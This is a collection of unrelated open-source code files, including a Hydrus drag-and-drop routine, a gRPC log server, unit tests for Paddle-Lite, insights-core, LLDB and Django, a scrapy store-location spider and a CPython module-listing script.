data_object = QMimeDataHydrusFiles()
#
new_options = HG.client_controller.new_options
do_secret_discord_dnd_fix = new_options.GetBoolean( 'secret_discord_dnd_fix' ) and alt_down
#
client_files_manager = HG.client_controller.client_files_manager
original_paths = []
media_and_original_paths = []
total_size = 0
for m in media:
hash = m.GetHash()
mime = m.GetMime()
total_size += m.GetSize()
original_path = client_files_manager.GetFilePath( hash, mime, check_file_exists = False )
original_paths.append( original_path )
media_and_original_paths.append( ( m, original_path ) )
#
discord_dnd_fix_possible = new_options.GetBoolean( 'discord_dnd_fix' ) and len( original_paths ) <= 50 and total_size < 200 * 1048576
temp_dir = HG.client_controller.temp_dir
if do_secret_discord_dnd_fix:
dnd_paths = original_paths
flags = QC.Qt.MoveAction
elif discord_dnd_fix_possible and os.path.exists( temp_dir ):
fallback_filename_terms = ClientExporting.ParseExportPhrase( '{hash}' )
try:
filename_pattern = new_options.GetString( 'discord_dnd_filename_pattern' )
filename_terms = ClientExporting.ParseExportPhrase( filename_pattern )
if len( filename_terms ) == 0:
raise Exception()
except:
filename_terms = fallback_filename_terms
dnd_paths = []
for ( m, original_path ) in media_and_original_paths:
filename = ClientExporting.GenerateExportFilename( temp_dir, m, filename_terms )
if filename == HC.mime_ext_lookup[ m.GetMime() ]:
filename = ClientExporting.GenerateExportFilename( temp_dir, m, fallback_filename_terms )
dnd_path = os.path.join( temp_dir, filename )
if not os.path.exists( dnd_path ):
HydrusPaths.MirrorFile( original_path, dnd_path )
dnd_paths.append( dnd_path )
flags = QC.Qt.MoveAction | QC.Qt.CopyAction
else:
dnd_paths = original_paths
flags = QC.Qt.CopyAction
uri_list = []
for path in dnd_paths:
uri_list.append( QC.QUrl.fromLocalFile( path ) )
data_object.setUrls( uri_list )
#
hashes = [ m.GetHash() for m in media ]
data_object.setHydrusFiles( page_key, hashes )
# old way of doing this that makes some external programs (discord) reject it
'''
if page_key is None:
encoded_page_key = None
else:
encoded_page_key = page_key.hex()
data_obj = ( encoded_page_key, [ hash.hex() for hash in hashes ] )
data_str = json.dumps( data_obj )
data_bytes = bytes( data_str, 'utf-8' )
data_object.setData( 'application/hydrus-media', data_bytes )
'''
#
drop_source.setMimeData( data_object )
result = drop_source.exec_( flags, QC.Qt.CopyAction )
return result
class FileDropTarget( QC.QObject ):
def __init__( self, parent, filenames_callable = None, url_callable = None, media_callable = None ):
QC.QObject.__init__( self, parent )
self._parent = parent
if parent:
parent.setAcceptDrops( True )
self._filenames_callable = filenames_callable
self._url_callable = url_callable
self._media_callable = media_callable
def eventFilter( self, object, event ):
if event.type() == QC.QEvent.Drop:
if self.OnDrop( event.pos().x(), event.pos().y() ):
event.setDropAction( self.OnData( event.mimeData(), event.proposedAction() ) )
event.accept()
elif event.type() == QC.QEvent.DragEnter:
event.accept()
return False
def OnData( self, mime_data, result ):
media_dnd = isinstance( mime_data, QMimeDataHydrusFiles )
urls_dnd = mime_data.hasUrls()
text_dnd = mime_data.hasText()
if media_dnd and self._media_callable is not None:
result = mime_data.hydrusFiles()
if result is not None:
( page_key, hashes ) = result
if page_key is not None:
QP.CallAfter( self._media_callable, page_key, hashes ) # callafter so we can terminate dnd event now
result = QC.Qt.MoveAction
# old way of doing it that messed up discord et al
'''
elif mime_data.formats().count( 'application/hydrus-media' ) and self._media_callable is not None:
mview = mime_data.data( 'application/hydrus-media' )
data_bytes = mview.data()
data_str = str( data_bytes, 'utf-8' )
(encoded_page_key, encoded_hashes) = json.loads( data_str )
if encoded_page_key is not None:
page_key = bytes.fromhex( encoded_page_key )
hashes = [ bytes.fromhex( encoded_hash ) for encoded_hash in encoded_hashes ]
QP.CallAfter( self._media_callable, page_key, hashes ) # callafter so we can terminate dnd event now
result = QC.Qt.MoveAction
'''
elif urls_dnd or text_dnd:
paths = []
urls = []
if urls_dnd:
dnd_items = mime_data.urls()
for dnd_item in dnd_items:
if dnd_item.isLocalFile():
paths.append( os.path.normpath( dnd_item.toLocalFile() ) )
else:
urls.append( dnd_item.url() )
else:
text = mime_data.text()
text_lines = HydrusText.DeserialiseNewlinedTexts( text )
for text_line in text_lines:
if text_line.startswith( 'http' ):
urls.append( text_line )
# ignore 'paths'
if self._filenames_callable is not None:
if len( paths ) > 0:
QP.CallAfter( self._filenames_callable, paths ) # callafter to terminate dnd event now
if self._url_callable is not None:
if len( urls ) > 0:
for url in urls:
QP.CallAfter( self._url_callable, url ) # callafter to terminate dnd event now
result = QC.Qt.IgnoreAction
else:
result = QC.Qt.IgnoreAction
return result
def OnDrop( self, x, y ):
screen_position = ClientGUIFunctions.ClientToScreen( self._parent, QC.QPoint( x, y ) )
drop_tlw = QW.QApplication.topLevelAt( screen_position )
my_tlw = self._parent.window()
if drop_tlw == my_tlw:
return True
else:
return False
# setting OnDragOver to return copy gives Linux trouble with page tab drops with shift held down
|
malib/rpc/log/log_server.py | zbzhu99/malib | 258 | 12745770 | <reponame>zbzhu99/malib<filename>malib/rpc/log/log_server.py<gh_stars>100-1000
import time
import grpc
from threading import Event
from concurrent import futures
from collections import Iterable
from malib.rpc.proto import log_pb2_grpc, log_pb2
from malib.utils import io_wrapper
from malib.utils.convert import utc_to_str, dump_dict
from malib.utils.io_wrapper import BaseIOWrapper, StandardIOWrapper
class LogServicer(log_pb2_grpc.LogRPCServicer):
def __init__(self, timeout=-1, ioers=None):
super().__init__()
self.timeout = timeout
self.ioers = []
if isinstance(ioers, Iterable):
for i in ioers:
assert isinstance(i, BaseIOWrapper)
self.ioers.append(i)
elif ioers is not None:
assert isinstance(ioers, BaseIOWrapper)
self.ioers.append(ioers)
else:
self.ioers.append(StandardIOWrapper())
self.alivetime = time.time()
def Log(self, info, context):
status = 0
target = None
try:
level = int(info.log_level)
msg = info.log_info
st = info.send_time
self.alivetime = time.time()
target = {
"ReceiveTime": time.time(),
"SendTime": st,
"Level": level,
"Content": msg,
}
except:
status = -1
target = {
"ReceiveTime": time.time(),
"SendTime": "N/A",
"Level": "N/A",
"Content": "Error",
}
for i in self.ioers:
i.write("LoggerServer: " + dump_dict(target))
return log_pb2.LogReply(status_code=str(status), send_time=time.time())
# def stop(self):
# for i in self.ioers:
# i.write('LoggerServer: Calling server stop')
class LoggerServer:
def __init__(self, port, io_wrappers=None, grace=5, max_workers=10):
self.port = port
self.grace = grace
self.server = grpc.server(futures.ThreadPoolExecutor(max_workers=max_workers))
self.io_wrappers = io_wrappers
log_pb2_grpc.add_LogRPCServicer_to_server(
LogServicer(ioers=io_wrappers), self.server
)
self.server.add_insecure_port(port)
def start(self):
self.server.start()
def stop(self):
for i in self.io_wrappers:
i.write("LoggerServer: Calling server stop")
self.server.stop(grace=self.grace)
def serve(port):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
log_pb2_grpc.add_LogRPCServicer_to_server(LogServicer(), server)
server.add_insecure_port(port)
server.start()
server.wait_for_termination()
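

# Illustrative entry point (not part of the original module); the port string is an
# assumption, and `serve` blocks until the process is terminated.
if __name__ == "__main__":
    serve("[::]:50052")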
|
lite/tests/unittest_py/pass/common/test_elementwise_scale_fuse_pass_base.py | 714627034/Paddle-Lite | 808 | 12745807 | <reponame>714627034/Paddle-Lite<gh_stars>100-1000
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('..')
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import numpy as np
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume, reproduce_failure
import hypothesis.strategies as st
def sample_program_configs(draw):
#elementwise param
in_shape_x = draw(
st.lists(
st.integers(
min_value=1, max_value=20), min_size=4, max_size=4))
in_shape_y = draw(
st.lists(
st.integers(
min_value=1, max_value=20), min_size=4, max_size=4))
assume((in_shape_x[0] == in_shape_y[0] or in_shape_x[0] == 1 or
in_shape_y[0] == 1) and (in_shape_x[0] >= in_shape_y[0]))
assume((in_shape_x[1] == in_shape_y[1] or in_shape_x[1] == 1 or
in_shape_y[1] == 1) and (in_shape_x[1] >= in_shape_y[1]))
assume((in_shape_x[2] == in_shape_y[2] or in_shape_x[2] == 1 or
in_shape_y[2] == 1) and (in_shape_x[2] >= in_shape_y[2]))
assume((in_shape_x[3] == in_shape_y[3] or in_shape_x[3] == 1 or
in_shape_y[3] == 1) and (in_shape_x[3] >= in_shape_y[3]))
axis = -1
#scale param
scale = draw(st.floats(min_value=0.5, max_value=5))
bias = draw(st.floats(min_value=0, max_value=1))
alpha = draw(st.floats(min_value=0, max_value=1))
bias_after_scale = draw(st.sampled_from([False, True]))
elementwise_op = OpConfig(
type='elementwise_mul',
inputs={"X": ["input_data_x"],
"Y": ["input_data_y"]},
outputs={"Out": ["elementwise_output_data"]},
attrs={"data_format": 'nchw',
"axis": axis})
scale_op = OpConfig(
type='scale',
inputs={"X": ["elementwise_output_data"]},
outputs={"Out": ["output_data"]},
attrs={
"scale": scale,
"bias": bias,
"alpha": alpha,
"bias_after_scale": bias_after_scale
})
ops = [elementwise_op, scale_op]
program_config = ProgramConfig(
ops=ops,
weights={},
inputs={
"input_data_x": TensorConfig(shape=in_shape_x),
"input_data_y": TensorConfig(shape=in_shape_y)
},
outputs=["output_data"])
return program_config
|
Python3/1284.py | rakhi2001/ecom7 | 854 | 12745817 | <gh_stars>100-1000
__________________________________________________________________________________________________
sample 16 ms submission
class Solution:
def minFlips(self, mat: List[List[int]]) -> int:
M, N = len(mat), len(mat[0])
res = float('inf')
dire = [(0,0),(1,0),(-1,0),(0,1),(0,-1)]
def turn(x,y):
for d in dire:
a, b = x + d[0], y + d[1]
if 0 <= a < M and 0 <= b < N:
mat[a][b] ^= 1
#all states of row 0
for k in range(1 << N):
cnt = 0
backup = [[xx for xx in yy] for yy in mat]
for j in range(N):
if k >> j & 1:
cnt += 1
turn(0,j)
for i in range(M - 1):
for j in range(N):
if mat[i][j] == 1:
cnt += 1
turn(i + 1, j)
is_successful = True
for j in range(N):
if mat[M - 1][j] == 1:
is_successful = False
break
if is_successful:
res = min(res,cnt)
mat = [[xx for xx in yy] for yy in backup]
return -1 if res == float('inf') else res
__________________________________________________________________________________________________
sample 20 ms submission
import functools
import itertools
class Solution:
@staticmethod
def minFlips(mat: List[List[int]]) -> int:
width = (m := len(mat)) * (n := len(mat[0]))
mat = functools.reduce(
lambda x, y: (x << 1) | y,
(val for row in mat for val in row),
0
)
flips, bfs, seen = 0, {mat}, {mat}
awidth, lwidth = width - n, n - 1
nshifts = itertools.cycle(range(n))
while bfs:
next_bfs = set()
for curr in bfs:
if curr == 0:
return flips
for shift, nshift in zip(range(width), nshifts):
cand = curr ^ (1 << shift)
if shift < awidth:
cand ^= 1 << (shift + n) # above
if shift >= n:
cand ^= 1 << (shift - n) # below
if nshift < lwidth:
cand ^= 1 << (shift + 1) # left
if nshift > 0:
cand ^= 1 << (shift - 1) # right
if cand not in seen:
seen.add(cand)
next_bfs.add(cand)
flips, bfs = flips + 1, next_bfs
return -1
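# Illustrative sanity checks (not part of the submissions above):
#   Solution.minFlips([[0]])             # -> 0 (already all zeros)
#   Solution.minFlips([[0, 0], [0, 1]])  # -> 3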
__________________________________________________________________________________________________
|
insights/parsers/tests/test_tuned.py | maxamillion/insights-core | 121 | 12745866 | import pytest
import doctest
from insights.parsers import SkipException, tuned
from insights.parsers.tuned import Tuned
from insights.tests import context_wrap
TUNED_OUTPUT = '''
Available profiles:
- balanced
- desktop
- latency-performance
- network-latency
- network-throughput
- powersave
- throughput-performance
- virtual-guest
- virtual-host
Current active profile: virtual-guest
'''.strip()
TUNED_OUTPUT2 = '''
Available profiles:
- balanced
- desktop
- latency-performance
- network-latency
- network-throughput
- powersave
- throughput-performance
- virtual-guest
- virtual-host
It seems that tuned daemon is not running, preset profile is not activated.
Preset profile: virtual-guest
'''.strip()
TUNED_OUTPUT3 = '''
Available profiles:
- balanced - General non-specialized tuned profile
- desktop - Optimize for the desktop use-case
- hpc-compute - Optimize for HPC compute workloads
- latency-performance - Optimize for deterministic performance at the cost of increased power consumption
- network-latency - Optimize for deterministic performance at the cost of increased power consumption, focused on low latency network performance
- network-throughput - Optimize for streaming network throughput, generally only necessary on older CPUs or 40G+ networks
- powersave - Optimize for low power consumption
- sap-netweaver - Optimize for SAP NetWeaver
- throughput-performance - Broadly applicable tuning that provides excellent performance across a variety of common server workloads
- virtual-guest - Optimize for running inside a virtual guest
- virtual-guest-vmware
- virtual-host - Optimize for running KVM guests
Current active profile: virtual-guest-vmware
'''.strip()
TUNED_OUTPUT4 = '''
'''.strip()
def test_active_profile():
tuned_output = Tuned(context_wrap(TUNED_OUTPUT))
assert len(tuned_output.get('available')) == 9
assert tuned_output.get('active') == 'virtual-guest'
assert tuned_output.get('available') == ['balanced',
'desktop',
'latency-performance',
'network-latency',
'network-throughput',
'powersave',
'throughput-performance',
'virtual-guest',
'virtual-host']
def test_preset_profile():
tuned_output = Tuned(context_wrap(TUNED_OUTPUT2))
assert len(tuned_output.get('available')) == 9
assert tuned_output.get('preset') == 'virtual-guest'
assert tuned_output.get('available') == ['balanced',
'desktop',
'latency-performance',
'network-latency',
'network-throughput',
'powersave',
'throughput-performance',
'virtual-guest',
'virtual-host']
def test_tuned_profile():
tuned_output = Tuned(context_wrap(TUNED_OUTPUT3))
assert len(tuned_output.get('available')) == 12
assert tuned_output.get('preset') is None
assert tuned_output.get('active') == 'virtual-guest-vmware'
assert 'sap-netweaver' in tuned_output.get('available')
assert 'virtual-guest-vmware' in tuned_output.get('available')
with pytest.raises(SkipException):
Tuned(context_wrap(''))
def test_doc_example():
env = {'tuned': Tuned(context_wrap(TUNED_OUTPUT))}
failed, total = doctest.testmod(tuned, globs=env)
assert failed == 0
|
setup.py | CodeBrew-LTD/django-hordak | 187 | 12745891 | <gh_stars>100-1000
#!/usr/bin/env python
from os.path import exists
from setuptools import setup, find_packages
setup(
name="django-hordak",
version=open("VERSION").read().strip(),
author="<NAME>",
author_email="<EMAIL>",
packages=find_packages(),
scripts=[],
url="https://github.com/adamcharnock/django-hordak",
license="MIT",
description="Double entry book keeping in Django",
long_description=open("README.rst").read() if exists("README.rst") else "",
include_package_data=True,
install_requires=[
"django>=1.10",
"django-mptt>=0.8",
"django-model-utils>=2.5.0",
"dj-database-url>=0.4.1",
"psycopg2-binary>=2.6.2",
"django-extensions>=1.7.3",
"django-smalluuid>=1.1.1",
"requests>=2",
"py-moneyed>=0.6.0",
"django-money>=0.9.1",
"django-import-export>=0.5.0",
"babel==2.5.1",
'openpyxl<=2.6;python_version<"3.5"',
],
)
|
lldb/test/API/tools/lldb-server/TestGdbRemoteCompletion.py | Machiry/checkedc-clang | 250 | 12745898 | <filename>lldb/test/API/tools/lldb-server/TestGdbRemoteCompletion.py
import tempfile
import gdbremote_testcase
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
from lldbgdbserverutils import *
class GdbRemoteCompletionTestCase(gdbremote_testcase.GdbRemoteTestCaseBase):
mydir = TestBase.compute_mydir(__file__)
def init_lldb_server(self):
self.debug_monitor_exe = get_lldb_server_exe()
if not self.debug_monitor_exe:
self.skipTest("lldb-server exe not found")
port_file = tempfile.NamedTemporaryFile().name
commandline_args = [
"platform",
"--listen",
"*:0",
"--socket-file",
port_file
]
server = self.spawnSubprocess(
get_lldb_server_exe(),
commandline_args,
install_remote=False)
self.assertIsNotNone(server)
self.stub_hostname = "localhost"
self.port = int(lldbutil.wait_for_file_on_target(self, port_file))
self.sock = self.create_socket()
self._server = Server(self.sock, server)
self.add_no_ack_remote_stream()
def generate_hex_path(self, target):
return str(os.path.join(self.getBuildDir(), target)).encode().hex()
@add_test_categories(["llgs"])
def test_autocomplete_path(self):
self.build()
self.init_lldb_server()
# Test file-included completion when flag is set to 0.
self.test_sequence.add_log_lines(
["read packet: $qPathComplete:0,{}#00".format(
self.generate_hex_path("main")),
"send packet: $M{},{}#00".format(
self.generate_hex_path("main.d"),
self.generate_hex_path("main.o"))
],
True)
# Test directory-only completion when flag is set to 1.
os.makedirs(os.path.join(self.getBuildDir(), "test"))
self.test_sequence.add_log_lines(
["read packet: $qPathComplete:1,{}#00".format(
self.generate_hex_path("tes")),
"send packet: $M{}{}#00".format(
self.generate_hex_path("test"),
os.path.sep.encode().hex()) # "test/" or "test\".
],
True)
self.expect_gdbremote_sequence()
|
locations/spiders/bonefishgrill.py | davidchiles/alltheplaces | 297 | 12745911 | # -*- coding: utf-8 -*-
import json
import re
import scrapy
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
DAY_MAPPING = {
'Monday': 'Mo',
'Tuesday': 'Tu',
'Wednesday': 'We',
'Thursday': 'Th',
'Friday': 'Fr',
'Saturday': 'Sa',
'Sunday': 'Su'
}
class BoneFishGrillSpider(scrapy.Spider):
download_delay = 0.2
name = "bonefishgrill"
allowed_domains = ["bonefishgrill.com"]
start_urls = (
'https://www.bonefishgrill.com/locations/all',
)
def parse(self, response):
urls = response.xpath('//li[@class="location-row"]/a/@href').extract()
for url in urls:
yield scrapy.Request(response.urljoin(url), callback=self.parse_location)
def parse_location(self, response):
data = response.xpath('//script[contains(text(), "initLocationDetail")][1]/text()').extract_first()
try:
properties = {
'ref': re.search(r'"UnitId":"(.*?)"', data).group(1),
'name': re.search(r'"City":"(.*?)"', data).group(1),
'addr_full': re.search(r'"Address":"(.*?)"', data).group(1),
'city': re.search(r'"City":"(.*?)"', data).group(1),
'state': re.search(r'"State":"(.*?)"', data).group(1),
'postcode': re.search(r'"Zip":"(.*?)"', data).group(1),
'phone': re.search(r'"Phone":"(.*?)"', data).group(1),
'lat': re.search(r'"Latitude":"(.*?)"', data).group(1),
'lon': re.search(r'"Longitude":"(.*?)"', data).group(1),
'website': response.url
}
hours = self.parse_hours(re.search(r'"Hours":(.*?})', data).group(1))
if hours:
properties['opening_hours'] = hours
yield GeojsonPointItem(**properties)
except:
pass
def parse_hours(self, response):
opening_hours = OpeningHours()
weekdays = response
hrs = json.loads(weekdays)
WEEKDAYS = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
for DAY in WEEKDAYS:
open = hrs.get(DAY+'Open')
close = hrs.get(DAY+'Close')
opening_hours.add_range(day=DAY_MAPPING[DAY],
open_time=open,
close_time=close,
time_format='%H:%M %p')
return opening_hours.as_opening_hours() |
tests/package_extract/extract.py | AppliedIntuition/subpar | 546 | 12745956 | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration test program for Subpar
Tests file extraction functionality (zip_safe=False)
"""
import os
import pkgutil
import sys
def main():
print('In extract.py main()')
# Test that imports are from real files on disk. Slightly tricky
# to test, since the 'subpar' package is imported before we
# extract and setup sys.path, so we can't "import subpar.test.something"
import extract_helper
assert os.path.isfile(extract_helper.__file__), (
extract_helper.__file__, sys.path)
import extract_helper_package
assert os.path.isfile(extract_helper_package.__file__), (
extract_helper_package.__file__, sys.path)
# Test resource extraction
dat = pkgutil.get_data('extract_helper_package', 'extract_dat.txt')
assert (dat == b'Dummy data file for extract.py\n'), dat
if __name__ == '__main__':
main()
|
hack/mkdocs_macros/feature_stability_table.py | javipolo/kops | 14,563 | 12745976 | <reponame>javipolo/kops<filename>hack/mkdocs_macros/feature_stability_table.py
#!/usr/bin/env python
# Copyright 2020 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def define_env(env):
"""Hook function"""
@env.macro
def kops_feature_table(**kwargs):
"""
Generate a markdown table which will be rendered when called, along with the supported passed keyword args.
:param kwargs:
kops_added_ff => Kops version in which this feature was added as a feature flag
kops_added_default => Kops version in which this feature was introduced as stable
k8s_min => Minimum k8s version which supports this feature
:return: rendered markdown table
"""
# this dict object maps the kwarg to its description, which will be used in the final table
supported_args = {
'kops_added_ff': 'Alpha (Feature Flag)',
'kops_added_default': 'Default',
'k8s_min': 'Minimum K8s Version'
}
# Create the initial strings to which we'll concatenate the relevant columns
title = '|'
separators = '|'
values = '|'
# Iterate over provided supported kwargs and match them with the provided values.
for arg, header in supported_args.items():
if arg not in kwargs.keys():
continue
if arg == 'kops_added_default' and 'kops_added_ff' not in kwargs.keys():
title += ' Introduced |'
else:
title += f' {header} |'
separators += ' :-: |'
if arg == 'k8s_min':
values += f' K8s {kwargs[arg]} |'
else:
values += f' Kops {kwargs[arg]} |'
# Create a list object containing all the table rows,
# Then return a string object which contains every list item in a new line.
table = [
title,
separators,
values
]
return '\n'.join(table)
def main():
pass
if __name__ == "__main__":
main()
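

# Illustrative rendering sketch (not part of the original macro file); `_DemoEnv` is a
# hypothetical stand-in for the mkdocs-macros plugin environment (which normally
# supplies the real `@env.macro` decorator), and the version numbers are made up.
if __name__ == "__main__":
    class _DemoEnv:
        def macro(self, fn):
            self.kops_feature_table = fn
            return fn

    _demo_env = _DemoEnv()
    define_env(_demo_env)
    # Prints:
    # | Alpha (Feature Flag) | Default | Minimum K8s Version |
    # | :-: | :-: | :-: |
    # | Kops 1.19 | Kops 1.21 | K8s 1.20 |
    print(_demo_env.kops_feature_table(kops_added_ff='1.19', kops_added_default='1.21', k8s_min='1.20'))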
|
src/main/python/com/bluehonour/utils/get_stock_data_path.py | kingmoon3/stock-data-analysis-and-prediction | 162 | 12745978 | #!/usr/bin/python
import sys
import os
import shutil
from readConfig import *
def get_stock_data_path():
config = ReadConfig()
path = config.find_path("config.ini")
config.__read__(path)
stock_path = config.get_stock("path")
if not os.path.exists(stock_path):
os.makedirs(stock_path)
return stock_path
def mkdir(directory):
"""
    If `directory` does not exist, create it; if it does exist, wipe it by
    removing the directory and recreating it empty.
    :param directory: path of the directory to (re)create
    :return:
"""
if os.path.exists(directory):
shutil.rmtree(directory)
os.makedirs(directory)
|
release/stubs.min/Autodesk/Revit/DB/__init___parts/CurveLoopIterator.py | htlcnn/ironpython-stubs | 182 | 12745990 | class CurveLoopIterator(object,IEnumerator[Curve],IDisposable,IEnumerator):
""" An iterator to a curve loop. """
def Dispose(self):
""" Dispose(self: CurveLoopIterator) """
pass
def MoveNext(self):
"""
MoveNext(self: CurveLoopIterator) -> bool
Increments the iterator to the next item.
Returns: True if there is a next available item in this iterator.
False if the
iterator has completed all available items.
"""
pass
def next(self,*args):
""" next(self: object) -> object """
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: CurveLoopIterator,disposing: bool) """
pass
def Reset(self):
"""
Reset(self: CurveLoopIterator)
Resets the iterator to the initial state.
"""
pass
def __contains__(self,*args):
""" __contains__[Curve](enumerator: IEnumerator[Curve],value: Curve) -> bool """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerator) -> object """
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
Current=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the item at the current position of the iterator.
Get: Current(self: CurveLoopIterator) -> Curve
"""
IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Specifies whether the .NET object represents a valid Revit entity.
Get: IsValidObject(self: CurveLoopIterator) -> bool
"""
|
Tools/scripts/generate_stdlib_module_names.py | oleksandr-pavlyk/cpython | 52,316 | 12746022 | <filename>Tools/scripts/generate_stdlib_module_names.py
# This script lists the names of standard library modules
# to update Python/stdlib_mod_names.h
import _imp
import os.path
import re
import subprocess
import sys
import sysconfig
SRC_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
STDLIB_PATH = os.path.join(SRC_DIR, 'Lib')
MODULES_SETUP = os.path.join(SRC_DIR, 'Modules', 'Setup')
SETUP_PY = os.path.join(SRC_DIR, 'setup.py')
IGNORE = {
'__init__',
'__pycache__',
'site-packages',
# Test modules and packages
'__hello__',
'__phello__',
'__hello_alias__',
'__phello_alias__',
'__hello_only__',
'_ctypes_test',
'_testbuffer',
'_testcapi',
'_testconsole',
'_testimportmultiple',
'_testinternalcapi',
'_testmultiphase',
'_xxsubinterpreters',
'_xxtestfuzz',
'distutils.tests',
'idlelib.idle_test',
'lib2to3.tests',
'test',
'xxlimited',
'xxlimited_35',
'xxsubtype',
}
# Windows extension modules
WINDOWS_MODULES = (
'_msi',
'_overlapped',
'_testconsole',
'_winapi',
'msvcrt',
'nt',
'winreg',
'winsound'
)
# macOS extension modules
MACOS_MODULES = (
'_scproxy',
)
# Pure Python modules (Lib/*.py)
def list_python_modules(names):
for filename in os.listdir(STDLIB_PATH):
if not filename.endswith(".py"):
continue
name = filename.removesuffix(".py")
names.add(name)
# Packages in Lib/
def list_packages(names):
for name in os.listdir(STDLIB_PATH):
if name in IGNORE:
continue
package_path = os.path.join(STDLIB_PATH, name)
if not os.path.isdir(package_path):
continue
if any(package_file.endswith(".py")
for package_file in os.listdir(package_path)):
names.add(name)
# Extension modules built by setup.py
def list_setup_extensions(names):
cmd = [sys.executable, SETUP_PY, "-q", "build", "--list-module-names"]
output = subprocess.check_output(cmd)
output = output.decode("utf8")
extensions = output.splitlines()
names |= set(extensions)
# Built-in and extension modules built by Modules/Setup
def list_modules_setup_extensions(names):
assign_var = re.compile("^[A-Z]+=")
with open(MODULES_SETUP, encoding="utf-8") as modules_fp:
for line in modules_fp:
# Strip comment
line = line.partition("#")[0]
line = line.rstrip()
if not line:
continue
if assign_var.match(line):
# Ignore "VAR=VALUE"
continue
if line in ("*disabled*", "*shared*"):
continue
parts = line.split()
if len(parts) < 2:
continue
# "errno errnomodule.c" => write "errno"
name = parts[0]
names.add(name)
# List frozen modules of the PyImport_FrozenModules list (Python/frozen.c).
# Use the "./Programs/_testembed list_frozen" command.
def list_frozen(names):
submodules = set()
for name in _imp._frozen_module_names():
# To skip __hello__, __hello_alias__ and etc.
if name.startswith('__'):
continue
if '.' in name:
submodules.add(name)
else:
names.add(name)
# Make sure all frozen submodules have a known parent.
for name in list(submodules):
if name.partition('.')[0] in names:
submodules.remove(name)
if submodules:
raise Exception(f'unexpected frozen submodules: {sorted(submodules)}')
def list_modules():
names = set(sys.builtin_module_names) | set(WINDOWS_MODULES) | set(MACOS_MODULES)
list_modules_setup_extensions(names)
list_setup_extensions(names)
list_packages(names)
list_python_modules(names)
list_frozen(names)
# Remove ignored packages and modules
for name in list(names):
package_name = name.split('.')[0]
# package_name can be equal to name
if package_name in IGNORE:
names.discard(name)
for name in names:
if "." in name:
raise Exception("sub-modules must not be listed")
return names
def write_modules(fp, names):
print("// Auto-generated by Tools/scripts/generate_stdlib_module_names.py.",
file=fp)
print("// List used to create sys.stdlib_module_names.", file=fp)
print(file=fp)
print("static const char* _Py_stdlib_module_names[] = {", file=fp)
for name in sorted(names):
print(f'"{name}",', file=fp)
print("};", file=fp)
def main():
if not sysconfig.is_python_build():
print(f"ERROR: {sys.executable} is not a Python build",
file=sys.stderr)
sys.exit(1)
fp = sys.stdout
names = list_modules()
write_modules(fp, names)
if __name__ == "__main__":
main()
|
ports/teensy/memzip_files/main.py | sebastien-riou/micropython | 13,648 | 12746040 | import pyb
print("Executing main.py")
led = pyb.LED(1)
led.on()
pyb.delay(100)
led.off()
pyb.delay(100)
led.on()
pyb.delay(100)
led.off()
|
examples/lists/tests.py | jpwatts/django-positions | 118 | 12746047 | import time
import doctest
import unittest
from examples.lists.models import List, Item
from django.test import TestCase
class GenericTestCase(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
# @unittest.skip("Some reason. If you are reading this in a test run someone did not fill this in.")
def test_doctests_standin(self):
        # This code just contains the old doctests for this module. They should most likely be
        # split out into their own tests at some point.
self.l = List.objects.create(name='To Do')
# create a couple items using the default position
result = self.l.items.create(name='Write Tests').name
expected_result = 'Write Tests'
self.assertEqual(result, expected_result)
result = list(self.l.items.values_list('name', 'position'))
expected_result = [(u'Write Tests', 0)]
self.assertEqual(result, expected_result)
result = self.l.items.create(name='Exercise').name
expected_result = 'Exercise'
self.assertEqual(result, expected_result)
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Write Tests', 0), (u'Exercise', 1)]
self.assertEqual(result, expected_result)
# create an item with an explicit position
result = self.l.items.create(name='Learn to spell Exercise', position=0).name
expected_result = 'Learn to spell Exercise'
self.assertEqual(result, expected_result)
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Learn to spell Exercise', 0), (u'Write Tests', 1), (u'Exercise', 2)]
self.assertEqual(result, expected_result)
